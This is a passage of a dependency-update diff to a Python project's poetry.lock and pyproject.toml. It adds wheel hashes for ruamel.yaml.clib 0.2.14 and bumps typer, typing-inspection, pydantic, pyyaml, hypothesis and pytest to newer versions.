+    {file = "ruamel.yaml.clib-0.2.14-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:b30110b29484adc597df6bd92a37b90e63a8c152ca8136aad100a02f8ba6d1b6"},
+    {file = "ruamel.yaml.clib-0.2.14-cp313-cp313-win32.whl", hash = "sha256:f4e97a1cf0b7a30af9e1d9dad10a5671157b9acee790d9e26996391f49b965a2"},
+    {file = "ruamel.yaml.clib-0.2.14-cp313-cp313-win_amd64.whl", hash = "sha256:090782b5fb9d98df96509eecdbcaffd037d47389a89492320280d52f91330d78"},
+    {file = "ruamel.yaml.clib-0.2.14-cp314-cp314-macosx_10_15_universal2.whl", hash = "sha256:7df6f6e9d0e33c7b1d435defb185095386c469109de723d514142632a7b9d07f"},
+    {file = "ruamel.yaml.clib-0.2.14-cp314-cp314-macosx_15_0_arm64.whl", hash = "sha256:70eda7703b8126f5e52fcf276e6c0f40b0d314674f896fc58c47b0aef2b9ae83"},
+    {file = "ruamel.yaml.clib-0.2.14-cp314-cp314-musllinux_1_2_i686.whl", hash = "sha256:a0cb71ccc6ef9ce36eecb6272c81afdc2f565950cdcec33ae8e6cd8f7fc86f27"},
+    {file = "ruamel.yaml.clib-0.2.14-cp314-cp314-musllinux_1_2_x86_64.whl", hash = "sha256:e7cb9ad1d525d40f7d87b6df7c0ff916a66bc52cb61b66ac1b2a16d0c1b07640"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:18c041b28f3456ddef1f1951d4492dbebe0f8114157c1b3c981a4611c2020792"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:d8354515ab62f95a07deaf7f845886cc50e2f345ceab240a3d2d09a9f7d77853"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:275f938692013a3883edbd848edde6d9f26825d65c9a2eb1db8baa1adc96a05d"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:16a60d69f4057ad9a92f3444e2367c08490daed6428291aa16cefb445c29b0e9"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5ac5ff9425d8acb8f59ac5b96bcb7fd3d272dc92d96a7c730025928ffcc88a7a"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:e1d1735d97fd8a48473af048739379975651fab186f8a25a9f683534e6904179"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-musllinux_1_2_i686.whl", hash = "sha256:83bbd8354f6abb3fdfb922d1ed47ad8d1db3ea72b0523dac8d07cdacfe1c0fcf"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:808c7190a0fe7ae7014c42f73897cf8e9ef14ff3aa533450e51b1e72ec5239ad"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-win32.whl", hash = "sha256:6d5472f63a31b042aadf5ed28dd3ef0523da49ac17f0463e10fda9c4a2773352"},
+    {file = "ruamel.yaml.clib-0.2.14-cp39-cp39-win_amd64.whl", hash = "sha256:8dd3c2cc49caa7a8d64b67146462aed6723a0495e44bf0aa0a2e94beaa8432f6"},
+    {file = "ruamel.yaml.clib-0.2.14.tar.gz", hash = "sha256:803f5044b13602d58ea378576dd75aa759f52116a0232608e8fdada4da33752e"},
 ]
 
 [[package]]
@@ -882,14 +911,14 @@ files = [
 
 [[package]]
 name = "typer"
-version = "0.17.3"
+version = "0.19.2"
 description = "Typer, build great CLIs. Easy to code. Based on Python type hints."
 optional = false
-python-versions = ">=3.7"
+python-versions = ">=3.8"
 groups = ["main"]
 files = [
-    {file = "typer-0.17.3-py3-none-any.whl", hash = "sha256:643919a79182ab7ac7581056d93c6a2b865b026adf2872c4d02c72758e6f095b"},
-    {file = "typer-0.17.3.tar.gz", hash = "sha256:0c600503d472bcf98d29914d4dcd67f80c24cc245395e2e00ba3603c9332e8ba"},
+    {file = "typer-0.19.2-py3-none-any.whl", hash = "sha256:755e7e19670ffad8283db353267cb81ef252f595aa6834a0d1ca9312d9326cb9"},
+    {file = "typer-0.19.2.tar.gz", hash = "sha256:9ad824308ded0ad06cc716434705f691d4ee0bfd0fb081839d2e426860e7fdca"},
 ]
 
 [package.dependencies]
@@ -912,14 +941,14 @@ files = [
 
 [[package]]
 name = "typing-inspection"
-version = "0.4.1"
+version = "0.4.2"
 description = "Runtime typing introspection tools"
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "typing_inspection-0.4.1-py3-none-any.whl", hash = "sha256:389055682238f53b04f7badcb49b989835495a96700ced5dab2d8feae4b26f51"},
-    {file = "typing_inspection-0.4.1.tar.gz", hash = "sha256:6ae134cc0203c33377d43188d4064e9b357dba58cff3185f22924610e70a9d28"},
+    {file = "typing_inspection-0.4.2-py3-none-any.whl", hash = "sha256:4ed1cacbdc298c220f1bd249ed5287caa16f34d44ef4e9c3d0cbad5b521545e7"},
+    {file = "typing_inspection-0.4.2.tar.gz", hash = "sha256:ba561c48a67c5958007083d386c3295464928b01faa735ab8547c5692e87f464"},
 ]
 
 [package.dependencies]
@@ -946,4 +975,4 @@ zstd = ["zstandard (>=0.18.0)"]
 [metadata]
 lock-version = "2.1"
 python-versions = "^3.11"
-content-hash = "eec85177858fceb69edde53396a2468b0c9f144faf95a15de6a20141f0101475"
+content-hash = "7cca89546fe57ce2062fbfb9118dcb7e2e164d74b5f9a44227471bdc963208a8"

pyproject.toml

@@ -7,14 +7,14 @@ readme = "README.md"
 
 [tool.poetry.dependencies]
 python = "^3.11"
-pyyaml = "^6.0.2"
+pyyaml = "^6.0.3"
 jsonschema = "^4.25.1"
 requests = "^2.32.5"
 ruamel-yaml = "^0.18.15"
-pydantic = "^2.11.7"
-typer = "^0.17.3"
-hypothesis = "^6.138.13"
-pytest = "^8.4.1"
+pydantic = "^2.11.10"
+typer = "^0.19.2"
+hypothesis = "^6.140.2"
+pytest = "^8.4.2"
 
 
 [build-system]